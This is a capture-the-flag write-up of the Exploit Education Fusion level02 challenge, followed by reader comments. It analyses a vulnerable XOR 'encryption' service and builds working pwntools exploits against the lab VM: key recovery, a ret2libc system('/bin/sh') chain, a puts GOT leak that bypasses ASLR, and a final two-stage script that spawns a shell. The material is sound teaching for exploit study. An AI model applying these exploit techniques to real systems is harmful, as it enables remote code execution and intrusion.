This level deals with some basic obfuscation / math stuff.
This level introduces non-executable memory and return into libc / .text / return orientated programming (ROP).
The description and source code can be found here:
http://exploit.education/fusion/level02/
Source Code Analysis
For this level, I looked at the source code and came up with a plan of attack before even launching the Fusion VM. Let’s step through it. I won’t bother with main()
as it’s only relevant purpose is to call the encrypt_file()
function. That function may look kinda long, but it’s actually pretty simple.
void encrypt_file() { // http://thedailywtf.com/Articles/Extensible-XML.aspx // maybe make bigger for inevitable xml-in-xml-in-xml ? unsigned char buffer[32 * 4096]; unsigned char op; size_t sz; int loop; printf("[-- Enterprise configuration file encryption service --]\n"); loop = 1; while(loop) { nread(0, &op, sizeof(op)); switch(op) { case 'E': nread(0, &sz, sizeof(sz)); nread(0, buffer, sz); cipher(buffer, sz); printf("[-- encryption complete. please mention " "474bd3ad-c65b-47ab-b041-602047ab8792 to support " "staff to retrieve your file --]\n"); nwrite(1, &sz, sizeof(sz)); nwrite(1, buffer, sz); break; case 'Q': loop = 0; break; default: exit(EXIT_FAILURE); } } }
I’m not sure why those comments at the start of the function are there, they don’t seem to be very relevant. Anyway, a few things are happening:
- Several variables are initialized (buffer, op, sz, and loop).
- A greeting message is printed.
- A while loop begins checking the condition of the “loop” variable (only loops if it’s not 0).
- User input is accepted for the “operation” variable.
- If that input was “E” then:
- Accept user input for the “sz” variable. This sets the size limit for the data to be encrypted.
- Accept user input for the “buffer” variable. This will be the data we want encrypted.
- Call the
cipher()
function. - Print a message when the encryption is complete.
- Write the size to stdout.
- Write the encrypted data to stdout.
- If “Q” or anything else is entered for the “op” then exit.
You may have noticed the vulnerability here. The user can specify the maximum size of the input. Even though there’s 131,072 bytes (32 * 4096) allocated to the “buffer” variable, it doesn’t matter as the user can simply specify a higher number.
The cipher()
function is a bit more complex, even though it’s not a proper encryption algorithm.
void cipher(unsigned char *blah, size_t len) { static int keyed; static unsigned int keybuf[XORSZ]; int blocks; unsigned int *blahi, j; if(keyed == 0) { int fd; fd = open("/dev/urandom", O_RDONLY); if(read(fd, &keybuf, sizeof(keybuf)) != sizeof(keybuf)) exit(EXIT_FAILURE); close(fd); keyed = 1; } blahi = (unsigned int *)(blah); blocks = (len / 4); if(len & 3) blocks += 1; for(j = 0; j < blocks; j++) { blahi[j] ^= keybuf[j % XORSZ]; } }
- Variables are declared (blah, len, keyed, keybuf, blocks, blahi, j).
- If the “keyed” variable is not equal to 0, then do the following:
- Open the “/dev/urandom” file.
- Read 32 bytes (
sizeof(keybuf)
) from “/dev/urandom” into the “keybuf” variable - Set the “keyed” variable to 1.
- Set “blahi” (an unsigned int pointer) to point to “blah” (the data to encrypt)
- Set the “blocks” variable to be the user-supplied length (“len” variable) divided by 4.
- If the “len” variable is not divisible by 4, then add 1 to the “blocks” variable.
- A for loop that performs the encryption, 4 bytes at a time (keybuf & blahi are unsigned ints).
- This encryption “algorithm” will simply XOR the data with whatever is in “keybuf”
While there is the obvious buffer overflow vulnerability, the problem is that whatever data you send will be XOR’ed with a random key. After looking at the source code for a while, I did spot one more mistake. If the cipher()
function is called multiple time, the “keybuf” variable will be the same each time. The “keyed” variable is declared but not initialized and it should occupy the same memory address each time. So, I should be able to send data, take the encrypted form, XOR the two together and get the key. Then, I can overwrite the saved EIP value with an “encrypted” address so that when the encryption happens on it, the desired “unencrypted” address will be left.
Interacting With The Program
The next step is to figure out how the program was intended to be used. This was a bit harder than I expected and couldn’t get it to work by simply using netcat and manually entering the expected input. One reason for this is that the “sz” (size) variable it’s expecting is a 4-byte integer. If I supplied “58” as input, it looks at that as “\x38\x35” (little-endian). What I need to send it, is “\x3a\x00\x00\x00”. That, coupled with figuring out where it wanted a newline character, made this a tedious task of trial-and-error. I suppose it wouldn’t have taken so long if I understood the C language a bit better, but such is life. Anyway, here’s a script I came up with to interact with the program in it’s intended fashion:
#!/usr/bin/env python3 from pwn import * io = remote("fusion", 20002) data = "Lorem ipsum dolor sit amet, consectetur adipiscing elit." print(io.recvline().decode()) io.send("E") io.send((len(data)).to_bytes(4, "little")) io.send(data) print(io.recvline().decode()) size = int.from_bytes(io.recv(4), 'little') encrypted = b"" while len(encrypted) < size: encrypted += io.recv(size) log.info(f"Size = {size}") log.info("Encrypted message:") print(encrypted) print() io.close()
andrew ~/fusion/level02 $ ./level02_test.py [+] Opening connection to fusion on port 20002: Done [-- Enterprise configuration file encryption service --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [*] Size = 56 [*] Encrypted message: b"\x8b\xc7\x86\xfe.\x17\xb0\xd1\x04\xdb&\x10%n\xa6Bg_`\xce\xa7\x14\x9c \xce\x82\x93\x14\xef\xc7.M\xa3\xd7{d'\xef\xb7\xa2\x0e\xce\xa3\xb5\x90\xd4\xf5.j\x15[\x9d\nH\x18z" [*] Closed connection to fusion port 20002
Now that I’ve got that working, I’ll start building out the attack. I’ll use a “ret2libc” technique to bypass both ASLR and NX protections.
Cheating
I like to build my exploits (or any script I write) and test them incrementally so that if something goes wrong, I’ll have a better idea of what the problem was. First, I’ll write the exploit pretending that ASLR is not enabled. I plan to create a ROP chain that calls system()
with a “/bin/sh” string passed to it. Normally, with ASLR enabled, the address of system()
would be randomized (along with everything else in libc) and you’d have no way of knowing it when attacking a remote machine. In this case, I know that the parent process for “level02” is not restarted each time a connection is made & closed. This means that I can attach to the process with GDB, print the address of system()
, and use that in my ROP chain knowing that it won’t change (until I restart the VM or the parent process).
Getting the address of system()
:
fusion@fusion ~ $ ps aux | grep level02 20002 1201 0.0 0.0 1816 52 ? Ss 05:44 0:00 /opt/fusion/bin/level02 fusion 1463 0.0 0.0 4184 796 pts/0 S+ 05:45 0:00 grep --color=auto level02 fusion@fusion ~ $ sudo gdb -q -p 1201 [sudo] password for fusion: warning: not using untrusted file "/home/fusion/.gdbinit" Attaching to process 1201 Reading symbols from /opt/fusion/bin/level02...done. Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done. done. Loaded symbols for /lib/i386-linux-gnu/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 0xb77cb424 in __kernel_vsyscall () (gdb) p system $1 = {<text variable, no debug info>} 0xb767fb20 <__libc_system> (gdb) p exit $2 = {<text variable, no debug info>} 0xb76759e0 <__GI_exit> (gdb) find 0xb767fb20, +9999999, "/bin/sh" 0xb777b8da warning: Unable to access target memory at 0xb77bdf62, halting search. 1 pattern found.
I also grabbed the address of exit()
so the program will cleanly exit when I close the shell. It’s not necessary here, but why not create good habits? I also did a search for a “/bin/sh” string starting at the address of system()
. This will also be randomized but I can just hard-code it into my script for now.
Here’s the “cheat” exploit:
#!/usr/bin/env python3 from pwn import * def encrypt(data): io.send("E") io.send((len(data)).to_bytes(4, "little")) io.send(data) print(io.recvline().decode()) size = int.from_bytes(io.recv(4), 'little') encrypted = b"" while len(encrypted) < size: encrypted += io.recv(size) return encrypted io = remote("fusion", 20002) print(io.recvline().decode()) data = "A" * 128 encrypted = encrypt(data) key = bytes(a ^ b for a, b in zip(data.encode(), encrypted)) payload = b"A" * 131088 payload += p32(0xb767fb20) # Address of system() payload += p32(0xb76759e0) # Address of exit() payload += p32(0xb777b8da) # Address of "/bin/sh" enc_data = b"" for i in range(0, len(payload), len(key)): enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key)) encrypt(enc_data) io.send("Q") io.interactive()
At this point, I shouldn’t have to explain how to find the offset of the saved return address (the 131088 number). You can see that I have the 3 addresses in my ROP chain. The address for exit()
comes after system()
so that when system()
hits ret
, it’ll pop the address for exit()
into EIP and cleanly exit the program. The address for the “/bin/sh” string is last because system()
will look to ESP+4 for an argument.
Testing it out:
andrew ~/fusion/level02 $ ./level02_system.py [+] Opening connection to fusion on port 20002: Done [-- Enterprise configuration file encryption service --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [*] Switching to interactive mode $ id uid=20002 gid=20002 groups=20002
Leaking Libc Address
The next step is to figure out how to get base address of libc. I used this blog post by @D4mianWayne to get a better understanding of ret2libc attacks and leaking the libc address:
https://d4mianwayne.github.io/posts/ret2libc-pwntools
That post explains, exactly, what I’ll need to do for this challenge with the only difference being the architecture. That post uses an x64 binary so function arguments are passed in registers instead of the stack.
The idea here is to overwrite the saved return address on the stack with the address of puts@plt
while passing a single argument to that “call,” the address of puts@got
. After you send that payload, you’ll receive some unpacked addresses, the first of which should be the address of puts()
. You can use that to calculate the base address of libc. Looking at the symbols in libc, you can find the offset to puts()
and subtract that from the actual address that was leaked. This gives you libc’s base address, from which you can calculate the actual address of any other function. Just find the offset and add that to the base address.
First, I’ll get the PLT and GOT addresses for puts()
in the level02 binary:
fusion@fusion ~ $ objdump -d /opt/fusion/bin/level02 | grep -A1 puts 08048930 <puts@plt>: 8048930: ff 25 b8 b3 04 08 jmp *0x804b3b8 ...
This shows that the PLT address is 0x8048930 and GOT address is 0x804b3b8.
Now I’ll need to find the puts()
offset within libc. To determine which libc binary is being used by this process, I can attach to it with GDB again:
fusion@fusion ~ $ sudo gdb -q -p 1201 [sudo] password for fusion: warning: not using untrusted file "/home/fusion/.gdbinit" Attaching to process 1201 Reading symbols from /opt/fusion/bin/level02...done. Reading symbols from /lib/i386-linux-gnu/libc.so.6...Reading symbols from /usr/lib/debug/lib/i386-linux-gnu/libc-2.13.so...done. done. Loaded symbols for /lib/i386-linux-gnu/libc.so.6 Reading symbols from /lib/ld-linux.so.2...(no debugging symbols found)...done. Loaded symbols for /lib/ld-linux.so.2 0xb77cb424 in __kernel_vsyscall () (gdb) info sharedlibrary From To Syms Read Shared Object Library 0xb7659be0 0xb7766784 Yes /lib/i386-linux-gnu/libc.so.6 0xb77cc830 0xb77e35cf Yes (*) /lib/ld-linux.so.2 (*): Shared library is missing debugging information.
While I’m here, I’m going to get the actual puts()
address so I can verify my results later on:
(gdb) p puts $1 = {<text variable, no debug info>} 0xb76a33b0 <_IO_puts>
To get the offset of puts()
, I can use readelf
to list the symbols in libc and grep for “puts”:
fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | grep " puts@" 423: 000603b0 444 FUNC WEAK DEFAULT 12 puts@@GLIBC_2.0
Now I need to modify my Python script to capture the address:
#!/usr/bin/env python3 from pwn import * io = remote("fusion", 20002) def encrypt(data): io.send("E") io.send((len(data)).to_bytes(4, "little")) io.send(data) print(io.recvline().decode()) size = int.from_bytes(io.recv(4), 'little') encrypted = b"" while len(encrypted) < size: encrypted += io.recv(size) return encrypted print(io.recvline().decode()) data = "A" * 128 encrypted = encrypt(data) sample = data[:128].encode() key = bytes(a ^ b for a, b in zip(sample, encrypted)) payload = b"A" * 131088 payload += p32(0x08048930) # Address of puts@plt payload += b"AAAA" payload += p32(0x0804b3b8) # Address of puts@got enc_data = b"" for i in range(0, len(payload), len(key)): enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key)) encrypt(enc_data) io.send("Q") puts_offset = 0x603b0 leak = u32(io.recv(4)) libc_base = leak - puts_offset log.info(f"Leaked puts() address: {hex(leak)}") log.info(f"Libc puts() offset: {hex(puts_offset)}") log.info(f"Libc base address: {hex(libc_base)}") print() io.close()
Let’s run it:
andrew ~/fusion/level02 $ ./level02_puts.py [+] Opening connection to fusion on port 20002: Done [-- Enterprise configuration file encryption service --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [*] Leaked puts() address: 0xb76583b0 [*] Libc puts() offset: 0x603b0 [*] Libc base address: 0xb75f8000 [*] Closed connection to fusion port 20002
That leaked address (0xb76583b0) is the same as the one I got from GDB on the Fusion VM.
Side Note
What if I didn’t have access to the libc binary and didn’t know what version it was? Each version is bound to have different offsets from its base address. Well, after leaking the address of puts()
, you could use a tool, like libc-database, to get the version of libc. For example, take the leaked puts()
address (0xb76583b0) and do a search based on the last 3 digits:
andrew ~/libc-database (master) $ ./find puts 3b0 archive-old-eglibc (id libc6_2.13-20ubuntu5_i386) archive-old-glibc (id libc6_2.5-0ubuntu14_amd64) archive-old-glibc (id libc6-amd64_2.5-0ubuntu14_i386)
Since I got multiple results, I could either leak another address and add it to the search, or just use trial and error in my exploit. However, I happen to know that the actual libc version used here is that first result.
Exploitation
I need a few more offset addresses to build this exploit. I’ll need the offset of exit()
(to cleanly exit the program when the shell closes) and system()
:
fusion@fusion ~ $ readelf -s /lib/i386-linux-gnu/libc.so.6 | egrep " system| exit" 135: 000329e0 45 FUNC GLOBAL DEFAULT 12 exit@@GLIBC_2.0 1409: 0003cb20 139 FUNC WEAK DEFAULT 12 system@@GLIBC_2.0
And I’ll need the string “/bin/sh” to be somewhere in memory. I could generate a rop chain to do this for me by using strcpy()
to put certain bytes into a writable section (such as .bss). However, I know that the string I need is already in libc so I can find the offset to it using strings
:
fusion@fusion ~ $ strings -atx /lib/i386-linux-gnu/libc.so.6 | grep "/bin/sh" 1388da /bin/sh
Final exploit script:
#!/usr/bin/env python3 from pwn import * def encrypt(data): io.send("E") io.send((len(data)).to_bytes(4, "little")) io.send(data) print(io.recvline().decode()) size = int.from_bytes(io.recv(4), "little") encrypted = b"" while len(encrypted) < size: encrypted += io.recv(size) return encrypted def get_key(): print(io.recvline().decode()) data = "A" * 128 encrypted = encrypt(data) sample = data.encode() return bytes(a ^ b for a, b in zip(sample, encrypted)) io = remote("fusion", 20002) key = get_key() payload = b"A" * 131088 payload += p32(0x08048930) # Address of puts@plt payload += b"AAAA" payload += p32(0x0804b3b8) # Address of puts@got enc_data = b"" for i in range(0, len(payload), len(key)): enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key)) encrypt(enc_data) io.send("Q") puts_offset = 0x603b0 leak = u32(io.recv(4)) libc_base = leak - puts_offset io.close() # Now to get shell io = remote("fusion", 20002) key = get_key() system_offset = 0x3cb20 exit_offset = 0x329e0 binsh_offset = 0x1388da payload = b"A" * 131088 payload += p32(libc_base + system_offset) payload += p32(libc_base + exit_offset) payload += p32(libc_base + binsh_offset) enc_data = b"" for i in range(0, len(payload), len(key)): enc_data += bytes(a ^ b for a, b in zip(payload[i:i+len(key)], key)) encrypt(enc_data) io.send("Q") io.interactive()
Testing it out:
andrew ~/fusion/level02 $ ./level02.py [+] Opening connection to fusion on port 20002: Done [-- Enterprise configuration file encryption service --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [*] Closed connection to fusion port 20002 [+] Opening connection to fusion on port 20002: Done [-- Enterprise configuration file encryption service --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [-- encryption complete. please mention 474bd3ad-c65b-47ab-b041-602047ab8792 to support staff to retrieve your file --] [*] Switching to interactive mode $ id uid=20002 gid=20002 groups=20002
The buffer overflow here is a bit different because of ASLR to find where program crash you need to look manually adding each time 4 bytes , instead of using fixed length payload with different chars “AAAABBBBCCCC”
correct me if I missed something
payload = b”A” * 131088
payload += p32(0x08048930) # Address of puts@plt
payload += b”AAAA”
payload += p32(0x0804b3b8) # Address of puts@got
I didn’t understand why the “AAAA” here ( as argument for puts@plt? )
also what’s the rule of puts@got here how it connects and get executed after puts@plt
mystery solved , we use “A”*4 because args located at EIP+4 , so we have puts@got address as argument for puts@plt
payload = b”A” * 131088
payload += p32(0x08048930) # Address of puts@plt
payload += b”AAAA”
payload += p32(0x0804b3b8) # Address of puts@got
Why we need exit() , the shell created by using exit()?
because as I understand in your solution it used for clean exit
“exit() (to cleanly exit the program when the shell closes) ”
also why ‘Q’ is used , the shell can’t be invoked inside the loop ?
( I tried and it don’t ) but why , the exploit takes place inside the loop .
The ‘Q’ allows us to quit the function without calling the exit function and then executing our new EIP
the exit() function can be reflected in syslog
running the following command :
cat /var/log/syslog
the buffer overflow will still appear there but after closing the shell there won’t be lines added